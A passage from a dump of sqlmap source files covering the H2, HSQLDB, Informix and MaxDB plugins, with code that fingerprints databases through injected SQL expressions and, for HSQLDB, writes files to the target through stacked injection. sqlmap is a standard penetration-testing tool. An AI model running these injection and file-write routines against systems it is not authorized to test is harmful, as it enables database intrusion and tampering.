logger.info(infoMsg)\n\n            result = inject.checkBooleanExpression(\"ROUNDMAGIC(PI())>=3\")\n\n            if not result:\n                warnMsg = \"the back-end DBMS is not %s\" % DBMS.H2\n                logger.warning(warnMsg)\n\n                return False\n            else:\n                setDbms(DBMS.H2)\n\n                self.getBanner()\n\n                return True\n        else:\n            warnMsg = \"the back-end DBMS is not %s\" % DBMS.H2\n            logger.warning(warnMsg)\n\n            return False\n\n    def getHostname(self):\n        warnMsg = \"on H2 it is not possible to enumerate the hostname\"\n        logger.warning(warnMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/h2/syntax.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.convert import getOrds\nfrom plugins.generic.syntax import Syntax as GenericSyntax\n\nclass Syntax(GenericSyntax):\n    @staticmethod\n    def escape(expression, quote=True):\n        \"\"\"\n        >>> Syntax.escape(\"SELECT 'abcdefgh' FROM foobar\") == \"SELECT CHAR(97)||CHAR(98)||CHAR(99)||CHAR(100)||CHAR(101)||CHAR(102)||CHAR(103)||CHAR(104) FROM foobar\"\n        True\n        \"\"\"\n\n        def escaper(value):\n            return \"||\".join(\"CHAR(%d)\" % _ for _ in getOrds(value))\n\n        return Syntax._escape(expression, quote, escaper)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/h2/takeover.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.takeover import Takeover as GenericTakeover\n\nclass Takeover(GenericTakeover):\n    def osCmd(self):\n        errMsg = \"on H2 it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osShell(self):\n        errMsg = \"on H2 it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osPwn(self):\n        errMsg = \"on H2 it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osSmb(self):\n        errMsg = \"on H2 it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/hsqldb/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import HSQLDB_SYSTEM_DBS\nfrom lib.core.unescaper import unescaper\nfrom plugins.dbms.hsqldb.enumeration import Enumeration\nfrom plugins.dbms.hsqldb.filesystem import Filesystem\nfrom plugins.dbms.hsqldb.fingerprint import Fingerprint\nfrom plugins.dbms.hsqldb.syntax import Syntax\nfrom plugins.dbms.hsqldb.takeover import Takeover\nfrom plugins.generic.misc import Miscellaneous\n\nclass HSQLDBMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):\n    \"\"\"\n    This class defines HSQLDB methods\n    \"\"\"\n\n    def __init__(self):\n        self.excludeDbsList = HSQLDB_SYSTEM_DBS\n\n        for cls in self.__class__.__bases__:\n            cls.__init__(self)\n\n    unescaper[DBMS.HSQLDB] = Syntax.escape\n"
  },
  {
    "path": "sqlmap/plugins/dbms/hsqldb/connector.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\ntry:\n    import jaydebeapi\n    import jpype\nexcept:\n    pass\n\nimport logging\n\nfrom lib.core.common import checkFile\nfrom lib.core.common import getSafeExString\nfrom lib.core.common import readInput\nfrom lib.core.data import conf\nfrom lib.core.data import logger\nfrom lib.core.exception import SqlmapConnectionException\nfrom plugins.generic.connector import Connector as GenericConnector\n\nclass Connector(GenericConnector):\n    \"\"\"\n    Homepage: https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/\n    User guide: https://pypi.python.org/pypi/JayDeBeApi/#usage & http://jpype.sourceforge.net/doc/user-guide/userguide.html\n    API: -\n    Debian package: -\n    License: LGPL & Apache License 2.0\n    \"\"\"\n\n    def connect(self):\n        self.initConnection()\n        try:\n            msg = \"please enter the location of 'hsqldb.jar'? \"\n            jar = readInput(msg)\n            checkFile(jar)\n            args = \"-Djava.class.path=%s\" % jar\n            jvm_path = jpype.getDefaultJVMPath()\n            jpype.startJVM(jvm_path, args)\n        except Exception as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        try:\n            driver = 'org.hsqldb.jdbc.JDBCDriver'\n            connection_string = 'jdbc:hsqldb:mem:.'  # 'jdbc:hsqldb:hsql://%s/%s' % (self.hostname, self.db)\n            self.connector = jaydebeapi.connect(driver, connection_string, str(self.user), str(self.password))\n        except Exception as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        self.initCursor()\n        self.printConnected()\n\n    def fetchall(self):\n        try:\n            return self.cursor.fetchall()\n        except Exception as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) '%s'\" % getSafeExString(ex))\n            return None\n\n    def execute(self, query):\n        retVal = False\n\n        try:\n            self.cursor.execute(query)\n            retVal = True\n        except Exception as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) '%s'\" % getSafeExString(ex))\n\n        self.connector.commit()\n\n        return retVal\n\n    def select(self, query):\n        retVal = None\n\n        upper_query = query.upper()\n\n        if query and not (upper_query.startswith(\"SELECT \") or upper_query.startswith(\"VALUES \")):\n            query = \"VALUES %s\" % query\n\n        if query and upper_query.startswith(\"SELECT \") and \" FROM \" not in upper_query:\n            query = \"%s FROM (VALUES(0))\" % query\n\n        self.cursor.execute(query)\n        retVal = self.cursor.fetchall()\n\n        return retVal\n"
  },
  {
    "path": "sqlmap/plugins/dbms/hsqldb/enumeration.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import unArrayizeValue\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.data import queries\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import HSQLDB_DEFAULT_SCHEMA\nfrom lib.request import inject\nfrom plugins.generic.enumeration import Enumeration as GenericEnumeration\n\nclass Enumeration(GenericEnumeration):\n    def getBanner(self):\n        if not conf.getBanner:\n            return\n\n        if kb.data.banner is None:\n            infoMsg = \"fetching banner\"\n            logger.info(infoMsg)\n\n            query = queries[DBMS.HSQLDB].banner.query\n            kb.data.banner = unArrayizeValue(inject.getValue(query, safeCharEncode=True))\n\n        return kb.data.banner\n\n    def getPrivileges(self, *args, **kwargs):\n        warnMsg = \"on HSQLDB it is not possible to enumerate the user privileges\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getHostname(self):\n        warnMsg = \"on HSQLDB it is not possible to enumerate the hostname\"\n        logger.warning(warnMsg)\n\n    def getCurrentDb(self):\n        return HSQLDB_DEFAULT_SCHEMA\n\n    def getStatements(self):\n        warnMsg = \"on HSQLDB it is not possible to enumerate the SQL statements\"\n        logger.warning(warnMsg)\n\n        return []\n"
  },
  {
    "path": "sqlmap/plugins/dbms/hsqldb/filesystem.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import randomStr\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.decorators import stackedmethod\nfrom lib.core.enums import PLACE\nfrom lib.request import inject\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.filesystem import Filesystem as GenericFilesystem\n\nclass Filesystem(GenericFilesystem):\n    def readFile(self, remoteFile):\n        errMsg = \"on HSQLDB it is not possible to read files\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    @stackedmethod\n    def stackedWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False):\n        funcName = randomStr()\n        max_bytes = 1024 * 1024\n\n        debugMsg = \"creating JLP procedure '%s'\" % funcName\n        logger.debug(debugMsg)\n\n        addFuncQuery = \"CREATE PROCEDURE %s (IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(%s)) \" % (funcName, max_bytes)\n        addFuncQuery += \"LANGUAGE JAVA DETERMINISTIC NO SQL \"\n        addFuncQuery += \"EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'\"\n        inject.goStacked(addFuncQuery)\n\n        fcEncodedList = self.fileEncode(localFile, \"hex\", True)\n        fcEncodedStr = fcEncodedList[0][2:]\n        fcEncodedStrLen = len(fcEncodedStr)\n\n        if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:\n            warnMsg = \"as the injection is on a GET parameter and the file \"\n            warnMsg += \"to be written hexadecimal value is %d \" % fcEncodedStrLen\n            warnMsg += \"bytes, this might cause errors in the file \"\n            warnMsg += \"writing process\"\n            logger.warning(warnMsg)\n\n        debugMsg = \"exporting the %s file content to file '%s'\" % (fileType, remoteFile)\n        logger.debug(debugMsg)\n\n        # Reference: http://hsqldb.org/doc/guide/sqlroutines-chapt.html#src_jrt_procedures\n        invokeQuery = \"CALL %s('%s', CAST('%s' AS VARBINARY(%s)))\" % (funcName, remoteFile, fcEncodedStr, max_bytes)\n        inject.goStacked(invokeQuery)\n\n        logger.debug(\"cleaning up\" % funcName)\n        delQuery = \"DELETE PROCEDURE %s\" % funcName\n        inject.goStacked(delQuery)\n\n        message = \"the local file '%s' has been written on the back-end DBMS\" % localFile\n        message += \"file system ('%s')\" % remoteFile\n        logger.info(message)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/hsqldb/fingerprint.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.common import Backend\nfrom lib.core.common import Format\nfrom lib.core.common import unArrayizeValue\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import DBMS\nfrom lib.core.session import setDbms\nfrom lib.core.settings import HSQLDB_ALIASES\nfrom lib.request import inject\nfrom plugins.generic.fingerprint import Fingerprint as GenericFingerprint\n\nclass Fingerprint(GenericFingerprint):\n    def __init__(self):\n        GenericFingerprint.__init__(self, DBMS.HSQLDB)\n\n    def getFingerprint(self):\n        value = \"\"\n        wsOsFp = Format.getOs(\"web server\", kb.headersFp)\n\n        if wsOsFp and not conf.api:\n            value += \"%s\\n\" % wsOsFp\n\n        if kb.data.banner:\n            dbmsOsFp = Format.getOs(\"back-end DBMS\", kb.bannerFp)\n\n            if dbmsOsFp and not conf.api:\n                value += \"%s\\n\" % dbmsOsFp\n\n        value += \"back-end DBMS: \"\n        actVer = Format.getDbms()\n\n        if not conf.extensiveFp:\n            value += actVer\n            return value\n\n        blank = \" \" * 15\n        value += \"active fingerprint: %s\" % actVer\n\n        if kb.bannerFp:\n            banVer = kb.bannerFp.get(\"dbmsVersion\")\n\n            if banVer:\n                if re.search(r\"-log$\", kb.data.banner or \"\"):\n                    banVer += \", logging enabled\"\n\n                banVer = Format.getDbms([banVer])\n                value += \"\\n%sbanner parsing fingerprint: %s\" % (blank, banVer)\n\n        htmlErrorFp = Format.getErrorParsedDBMSes()\n\n        if htmlErrorFp:\n            value += \"\\n%shtml error message fingerprint: %s\" % (blank, htmlErrorFp)\n\n        return value\n\n    def checkDbms(self):\n        \"\"\"\n        References for fingerprint:\n        DATABASE_VERSION()\n        version 2.2.6 added two-arg REPLACE functio REPLACE('a','a') compared to REPLACE('a','a','d')\n        version 2.2.5 added SYSTIMESTAMP function\n        version 2.2.3 added REGEXPR_SUBSTRING and REGEXPR_SUBSTRING_ARRAY functions\n        version 2.2.0 added support for ROWNUM() function\n        version 2.1.0 added MEDIAN aggregate function\n        version < 2.0.1 added support for datetime ROUND and TRUNC functions\n        version 2.0.0 added VALUES support\n        version 1.8.0.4 Added org.hsqldbdb.Library function, getDatabaseFullProductVersion to return the\n                        full version string, including the 4th digit (e.g 1.8.0.4).\n        version 1.7.2 CASE statements added and INFORMATION_SCHEMA\n\n        \"\"\"\n\n        if not conf.extensiveFp and Backend.isDbmsWithin(HSQLDB_ALIASES):\n            setDbms(\"%s %s\" % (DBMS.HSQLDB, Backend.getVersion()))\n\n            if Backend.isVersionGreaterOrEqualThan(\"1.7.2\"):\n                kb.data.has_information_schema = True\n\n            self.getBanner()\n\n            return True\n\n        infoMsg = \"testing %s\" % DBMS.HSQLDB\n        logger.info(infoMsg)\n\n        result = inject.checkBooleanExpression(\"CASEWHEN(1=1,1,0)=1\")\n\n        if result:\n            infoMsg = \"confirming %s\" % DBMS.HSQLDB\n            logger.info(infoMsg)\n\n            result = inject.checkBooleanExpression(\"ROUNDMAGIC(PI())>=3\")\n\n            if not result:\n                warnMsg = \"the back-end DBMS is not %s\" % DBMS.HSQLDB\n                logger.warning(warnMsg)\n\n                return False\n            else:\n                result = inject.checkBooleanExpression(\"ZERO() IS 0\")   # Note: check for H2 DBMS (sharing majority of same functions)\n                if result:\n                    warnMsg = \"the back-end DBMS is not %s\" % DBMS.HSQLDB\n                    logger.warning(warnMsg)\n\n                    return False\n\n                kb.data.has_information_schema = True\n                Backend.setVersion(\">= 1.7.2\")\n                setDbms(\"%s 1.7.2\" % DBMS.HSQLDB)\n\n                banner = self.getBanner()\n                if banner:\n                    Backend.setVersion(\"= %s\" % banner)\n                else:\n                    if inject.checkBooleanExpression(\"(SELECT [RANDNUM] FROM (VALUES(0)))=[RANDNUM]\"):\n                        Backend.setVersionList([\">= 2.0.0\", \"< 2.3.0\"])\n                    else:\n                        banner = unArrayizeValue(inject.getValue(\"\\\"org.hsqldbdb.Library.getDatabaseFullProductVersion\\\"()\", safeCharEncode=True))\n                        if banner:\n                            Backend.setVersion(\"= %s\" % banner)\n                        else:\n                            Backend.setVersionList([\">= 1.7.2\", \"< 1.8.0\"])\n\n            return True\n        else:\n            warnMsg = \"the back-end DBMS is not %s\" % DBMS.HSQLDB\n            logger.warning(warnMsg)\n\n            dbgMsg = \"...or version is < 1.7.2\"\n            logger.debug(dbgMsg)\n\n            return False\n\n    def getHostname(self):\n        warnMsg = \"on HSQLDB it is not possible to enumerate the hostname\"\n        logger.warning(warnMsg)\n\n    def checkDbmsOs(self, detailed=False):\n        if Backend.getOs():\n            infoMsg = \"the back-end DBMS operating system is %s\" % Backend.getOs()\n            logger.info(infoMsg)\n        else:\n            self.userChooseDbmsOs()\n"
  },
  {
    "path": "sqlmap/plugins/dbms/hsqldb/syntax.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.convert import getOrds\nfrom plugins.generic.syntax import Syntax as GenericSyntax\n\nclass Syntax(GenericSyntax):\n    @staticmethod\n    def escape(expression, quote=True):\n        \"\"\"\n        >>> Syntax.escape(\"SELECT 'abcdefgh' FROM foobar\") == \"SELECT CHAR(97)||CHAR(98)||CHAR(99)||CHAR(100)||CHAR(101)||CHAR(102)||CHAR(103)||CHAR(104) FROM foobar\"\n        True\n        \"\"\"\n\n        def escaper(value):\n            return \"||\".join(\"CHAR(%d)\" % _ for _ in getOrds(value))\n\n        return Syntax._escape(expression, quote, escaper)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/hsqldb/takeover.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.takeover import Takeover as GenericTakeover\n\nclass Takeover(GenericTakeover):\n    def osCmd(self):\n        errMsg = \"on HSQLDB it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osShell(self):\n        errMsg = \"on HSQLDB it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osPwn(self):\n        errMsg = \"on HSQLDB it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osSmb(self):\n        errMsg = \"on HSQLDB it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/informix/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import INFORMIX_SYSTEM_DBS\nfrom lib.core.unescaper import unescaper\n\nfrom plugins.dbms.informix.enumeration import Enumeration\nfrom plugins.dbms.informix.filesystem import Filesystem\nfrom plugins.dbms.informix.fingerprint import Fingerprint\nfrom plugins.dbms.informix.syntax import Syntax\nfrom plugins.dbms.informix.takeover import Takeover\nfrom plugins.generic.misc import Miscellaneous\n\nclass InformixMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):\n    \"\"\"\n    This class defines Informix methods\n    \"\"\"\n\n    def __init__(self):\n        self.excludeDbsList = INFORMIX_SYSTEM_DBS\n\n        for cls in self.__class__.__bases__:\n            cls.__init__(self)\n\n    unescaper[DBMS.INFORMIX] = Syntax.escape\n"
  },
  {
    "path": "sqlmap/plugins/dbms/informix/connector.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\ntry:\n    import ibm_db_dbi\nexcept:\n    pass\n\nimport logging\n\nfrom lib.core.common import getSafeExString\nfrom lib.core.data import conf\nfrom lib.core.data import logger\nfrom lib.core.exception import SqlmapConnectionException\nfrom plugins.generic.connector import Connector as GenericConnector\n\nclass Connector(GenericConnector):\n    \"\"\"\n    Homepage: https://github.com/ibmdb/python-ibmdb\n    User guide: https://github.com/ibmdb/python-ibmdb/wiki/README\n    API: https://www.python.org/dev/peps/pep-0249/\n    License: Apache License 2.0\n    \"\"\"\n\n    def connect(self):\n        self.initConnection()\n\n        try:\n            database = \"DATABASE=%s;HOSTNAME=%s;PORT=%s;PROTOCOL=TCPIP;\" % (self.db, self.hostname, self.port)\n            self.connector = ibm_db_dbi.connect(database, self.user, self.password)\n        except ibm_db_dbi.OperationalError as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        self.initCursor()\n        self.printConnected()\n\n    def fetchall(self):\n        try:\n            return self.cursor.fetchall()\n        except ibm_db_dbi.ProgrammingError as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) %s\" % getSafeExString(ex))\n            return None\n\n    def execute(self, query):\n        try:\n            self.cursor.execute(query)\n        except (ibm_db_dbi.OperationalError, ibm_db_dbi.ProgrammingError) as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) %s\" % getSafeExString(ex))\n        except ibm_db_dbi.InternalError as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        self.connector.commit()\n\n    def select(self, query):\n        self.execute(query)\n        return self.fetchall()\n"
  },
  {
    "path": "sqlmap/plugins/dbms/informix/enumeration.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.data import logger\nfrom plugins.generic.enumeration import Enumeration as GenericEnumeration\n\nclass Enumeration(GenericEnumeration):\n    def searchDb(self):\n        warnMsg = \"on Informix searching of databases is not implemented\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def searchTable(self):\n        warnMsg = \"on Informix searching of tables is not implemented\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def searchColumn(self):\n        warnMsg = \"on Informix searching of columns is not implemented\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def search(self):\n        warnMsg = \"on Informix search option is not available\"\n        logger.warning(warnMsg)\n\n    def getStatements(self):\n        warnMsg = \"on Informix it is not possible to enumerate the SQL statements\"\n        logger.warning(warnMsg)\n\n        return []\n"
  },
  {
    "path": "sqlmap/plugins/dbms/informix/filesystem.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom plugins.generic.filesystem import Filesystem as GenericFilesystem\n\nclass Filesystem(GenericFilesystem):\n    pass\n"
  },
  {
    "path": "sqlmap/plugins/dbms/informix/fingerprint.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import Backend\nfrom lib.core.common import Format\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import DBMS\nfrom lib.core.session import setDbms\nfrom lib.core.settings import INFORMIX_ALIASES\nfrom lib.request import inject\nfrom plugins.generic.fingerprint import Fingerprint as GenericFingerprint\n\nclass Fingerprint(GenericFingerprint):\n    def __init__(self):\n        GenericFingerprint.__init__(self, DBMS.INFORMIX)\n\n    def getFingerprint(self):\n        value = \"\"\n        wsOsFp = Format.getOs(\"web server\", kb.headersFp)\n\n        if wsOsFp:\n            value += \"%s\\n\" % wsOsFp\n\n        if kb.data.banner:\n            dbmsOsFp = Format.getOs(\"back-end DBMS\", kb.bannerFp)\n\n            if dbmsOsFp:\n                value += \"%s\\n\" % dbmsOsFp\n\n        value += \"back-end DBMS: \"\n\n        if not conf.extensiveFp:\n            value += DBMS.INFORMIX\n            return value\n\n        actVer = Format.getDbms()\n        blank = \" \" * 15\n        value += \"active fingerprint: %s\" % actVer\n\n        if kb.bannerFp:\n            banVer = kb.bannerFp.get(\"dbmsVersion\")\n\n            if banVer:\n                banVer = Format.getDbms([banVer])\n                value += \"\\n%sbanner parsing fingerprint: %s\" % (blank, banVer)\n\n        htmlErrorFp = Format.getErrorParsedDBMSes()\n\n        if htmlErrorFp:\n            value += \"\\n%shtml error message fingerprint: %s\" % (blank, htmlErrorFp)\n\n        return value\n\n    def checkDbms(self):\n        if not conf.extensiveFp and Backend.isDbmsWithin(INFORMIX_ALIASES):\n            setDbms(DBMS.INFORMIX)\n\n            self.getBanner()\n\n            return True\n\n        infoMsg = \"testing %s\" % DBMS.INFORMIX\n        logger.info(infoMsg)\n\n        result = inject.checkBooleanExpression(\"[RANDNUM]=(SELECT [RANDNUM] FROM SYSMASTER:SYSDUAL)\")\n\n        if result:\n            infoMsg = \"confirming %s\" % DBMS.INFORMIX\n            logger.info(infoMsg)\n\n            result = inject.checkBooleanExpression(\"(SELECT DBINFO('DBNAME') FROM SYSMASTER:SYSDUAL) IS NOT NULL\")\n\n            if not result:\n                warnMsg = \"the back-end DBMS is not %s\" % DBMS.INFORMIX\n                logger.warning(warnMsg)\n\n                return False\n\n            # Determine if it is Informix >= 11.70\n            if inject.checkBooleanExpression(\"CHR(32)=' '\"):\n                Backend.setVersion(\">= 11.70\")\n\n            setDbms(DBMS.INFORMIX)\n\n            self.getBanner()\n\n            if not conf.extensiveFp:\n                return True\n\n            infoMsg = \"actively fingerprinting %s\" % DBMS.INFORMIX\n            logger.info(infoMsg)\n\n            for version in (\"14.1\", \"12.1\", \"11.7\", \"11.5\", \"10.0\"):\n                output = inject.checkBooleanExpression(\"EXISTS(SELECT 1 FROM SYSMASTER:SYSDUAL WHERE DBINFO('VERSION,'FULL') LIKE '%%%s%%')\" % version)\n\n                if output:\n                    Backend.setVersion(version)\n                    break\n\n            return True\n        else:\n            warnMsg = \"the back-end DBMS is not %s\" % DBMS.INFORMIX\n            logger.warning(warnMsg)\n\n            return False\n"
  },
  {
    "path": "sqlmap/plugins/dbms/informix/syntax.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.common import isDBMSVersionAtLeast\nfrom lib.core.common import randomStr\nfrom lib.core.convert import getOrds\nfrom plugins.generic.syntax import Syntax as GenericSyntax\n\nclass Syntax(GenericSyntax):\n    @staticmethod\n    def escape(expression, quote=True):\n        \"\"\"\n        >>> from lib.core.common import Backend\n        >>> Backend.setVersion('12.10')\n        ['12.10']\n        >>> Syntax.escape(\"SELECT 'abcdefgh' FROM foobar\") == \"SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar\"\n        True\n        \"\"\"\n\n        def escaper(value):\n            return \"||\".join(\"CHR(%d)\" % _ for _ in getOrds(value))\n\n        retVal = expression\n\n        if isDBMSVersionAtLeast(\"11.70\"):\n            excluded = {}\n            for _ in re.findall(r\"DBINFO\\([^)]+\\)\", expression):\n                excluded[_] = randomStr()\n                expression = expression.replace(_, excluded[_])\n\n            retVal = Syntax._escape(expression, quote, escaper)\n\n            for _ in excluded.items():\n                retVal = retVal.replace(_[1], _[0])\n\n        return retVal\n"
  },
  {
    "path": "sqlmap/plugins/dbms/informix/takeover.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom plugins.generic.takeover import Takeover as GenericTakeover\n\nclass Takeover(GenericTakeover):\n    def __init__(self):\n        self.__basedir = None\n        self.__datadir = None\n\n        GenericTakeover.__init__(self)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/maxdb/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import MAXDB_SYSTEM_DBS\nfrom lib.core.unescaper import unescaper\nfrom plugins.dbms.maxdb.enumeration import Enumeration\nfrom plugins.dbms.maxdb.filesystem import Filesystem\nfrom plugins.dbms.maxdb.fingerprint import Fingerprint\nfrom plugins.dbms.maxdb.syntax import Syntax\nfrom plugins.dbms.maxdb.takeover import Takeover\nfrom plugins.generic.misc import Miscellaneous\n\nclass MaxDBMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):\n    \"\"\"\n    This class defines SAP MaxDB methods\n    \"\"\"\n\n    def __init__(self):\n        self.excludeDbsList = MAXDB_SYSTEM_DBS\n\n        for cls in self.__class__.__bases__:\n            cls.__init__(self)\n\n    unescaper[DBMS.MAXDB] = Syntax.escape\n"
  },
  {
    "path": "sqlmap/plugins/dbms/maxdb/connector.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.connector import Connector as GenericConnector\n\nclass Connector(GenericConnector):\n    def connect(self):\n        errMsg = \"on SAP MaxDB it is not (currently) possible to establish a \"\n        errMsg += \"direct connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/maxdb/enumeration.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.common import isListLike\nfrom lib.core.common import isTechniqueAvailable\nfrom lib.core.common import readInput\nfrom lib.core.common import safeSQLIdentificatorNaming\nfrom lib.core.common import unsafeSQLIdentificatorNaming\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.data import paths\nfrom lib.core.data import queries\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import PAYLOAD\nfrom lib.core.exception import SqlmapMissingMandatoryOptionException\nfrom lib.core.exception import SqlmapNoneDataException\nfrom lib.core.exception import SqlmapUserQuitException\nfrom lib.core.settings import CURRENT_DB\nfrom lib.utils.brute import columnExists\nfrom lib.utils.pivotdumptable import pivotDumpTable\nfrom plugins.generic.enumeration import Enumeration as GenericEnumeration\nfrom thirdparty import six\nfrom thirdparty.six.moves import zip as _zip\n\nclass Enumeration(GenericEnumeration):\n    def __init__(self):\n        GenericEnumeration.__init__(self)\n\n        kb.data.processChar = lambda x: x.replace('_', ' ') if x else x\n\n    def getPasswordHashes(self):\n        warnMsg = \"on SAP MaxDB it is not possible to enumerate the user password hashes\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getDbs(self):\n        if len(kb.data.cachedDbs) > 0:\n            return kb.data.cachedDbs\n\n        infoMsg = \"fetching database names\"\n        logger.info(infoMsg)\n\n        rootQuery = queries[DBMS.MAXDB].dbs\n        query = rootQuery.inband.query\n        retVal = pivotDumpTable(\"(%s) AS %s\" % (query, kb.aliasName), ['%s.schemaname' % kb.aliasName], blind=True)\n\n        if retVal:\n            